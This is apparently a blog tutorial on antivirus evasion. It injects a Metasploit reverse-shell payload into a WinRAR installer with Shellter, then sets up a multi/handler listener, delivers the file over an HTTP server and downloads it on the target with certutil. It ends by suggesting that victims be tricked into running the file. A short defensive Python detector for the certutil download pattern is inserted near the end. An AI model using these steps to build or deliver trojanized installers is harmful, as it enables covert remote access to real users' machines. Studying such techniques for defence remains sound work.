Antivirus Evasion With Shellter

Software Sinner
5 min read · Apr 12, 2022

Attackers often need to bypass antivirus controls while gaining access to a system. As a security professional, you must understand these techniques to support both offensive and defensive work. I will cover some of them using a tool well known among security professionals called Shellter.

Shellter is a dynamic shellcode injection tool that can be used to inject shellcode into native Windows applications (currently 32-bit apps only).

Tools needed for this walkthrough:

  • Linux environment
  • A target Windows machine or VM
  • Shellter tool
  • WinRAR download
  • Metasploit

1. Run the following commands to install Shellter if you don't already have it deployed.

Since Shellter is designed to run on Windows, we will also install Wine, a compatibility layer capable of running Win32 applications on several POSIX-compliant operating systems.

sudo apt -y install wine
sudo apt -y install shellter

2. Once everything is installed, running shellter in a terminal will provide us with a new console running under wine.

3. Next we need an executable file to inject into. For this example, we will download the well-known WinRAR file archiver.

4. Now we return to the Shellter interface running in the terminal. Shellter can run in either Auto or Manual mode. In Manual mode, the tool launches the PE (Portable Executable) we want to use for injection and lets us manipulate it at a more granular level. We can use this mode to customize the injection process in detail in case the automatically selected options fail.

For the purposes of this example, we will run Shellter in Auto mode by selecting ‘A’ at the prompt.

5. For the PE target, enter the full path of the file we want to inject into. In this case, it was in our Downloads directory.

Before analyzing or altering the original PE in any way, Shellter first creates a backup of the file. This will take some time, so grab a coffee while the process runs…

As soon as Shellter finds a suitable place to inject our payload, it will ask us if we want to enable Stealth Mode, which will attempt to restore the execution flow of the PE after our payload has been executed. Go ahead and type in ‘Y’ in the prompt for yes.

At this point, we are presented with the list of available payloads. These include popular selections such as meterpreter, but Shellter also supports custom payloads. Type ‘L’ at the first prompt for a listed payload and then continue with option ‘1’.

For our payload we need to provide our local machine's IP address along with the port we want to listen on.

6. With all parameters set, Shellter will inject the payload into the WinRAR installer and attempt to reach the first instruction of the payload. We now need to open a listener in Metasploit to catch the connection from the PE once it is executed on the target machine.

Run the following commands in another terminal window:

msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST <Your IP here>
set LPORT <Your chosen port here>
run

Once you run the handler, it will start listening for incoming connections on that IP and port.

Now we switch over to our target Windows machine and grab the malicious PE file from our attacking machine. We will run a Python SimpleHTTPServer on port 80 to serve the file.

On the attacking machine, in the same directory as the malicious PE file, run the following command:

python -m SimpleHTTPServer 80

Switching over to the Windows host, we need to fetch this file from the Python server on the attacking machine.

Windows CMD command to grab the file from the attack machine:

certutil.exe -urlcache -split -f "http://<your ip here>:80/winrar-x32-611.exe"

The file is now on the Desktop, and if executed it should connect back to our Metasploit listener with a shell on the target machine.
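From the defender's side, the transfer and execution described above leave a recognisable trace in process-creation telemetry. The following Python is an added example, not code from the original post: it scans constructed log lines (the simplified "Image=... CommandLine=..." record shape and the 10.0.0.5 address are assumptions, not real telemetry) for certutil's -urlcache download pattern and pairs the fetched file name with a later launch of that same file.

```python
import re

# Constructed sample of process-creation records (not real telemetry). The
# "Image=... CommandLine=..." shape is an assumption about the log format.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil.exe -urlcache -split -f "http://10.0.0.5:80/winrar-x32-611.exe"
Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil -hashfile C:\\Users\\u\\file.zip SHA256
Image=C:\\Users\\u\\Desktop\\winrar-x32-611.exe CommandLine=winrar-x32-611.exe
Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe notes.txt
"""

RECORD_RE = re.compile(r"Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Last component of a Windows path or URL, lower-cased for comparison."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def download_url(image, cmd):
    """Return the fetched URL when certutil is used as a downloader, else None."""
    if basename(image) != "certutil.exe":
        return None
    tokens = cmd.lower().split()
    if "-urlcache" not in tokens or "-f" not in tokens:
        return None
    m = URL_RE.search(cmd)
    return m.group(0) if m else None


def find_executed_downloads(log_text):
    """Pair each certutil download with a later launch of a file of the same name."""
    pending, executed = {}, []   # pending: file name -> URL it was fetched from
    for line in log_text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        url = download_url(m["image"], m["cmd"])
        if url:
            pending[basename(url)] = url
        elif basename(m["image"]) in pending:
            executed.append((pending[basename(m["image"])], m["image"]))
    return executed


if __name__ == "__main__":
    for url, image in find_executed_downloads(SAMPLE_LOG):
        print(f"ALERT: {image} was fetched via certutil from {url} and then executed")
```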

In a real-world scenario, an attacker would have to trick the user into downloading the malicious PE, either via email or other means of communication, hoping that the AV does not detect the file. Once they execute that file, it's a free game from there ;)
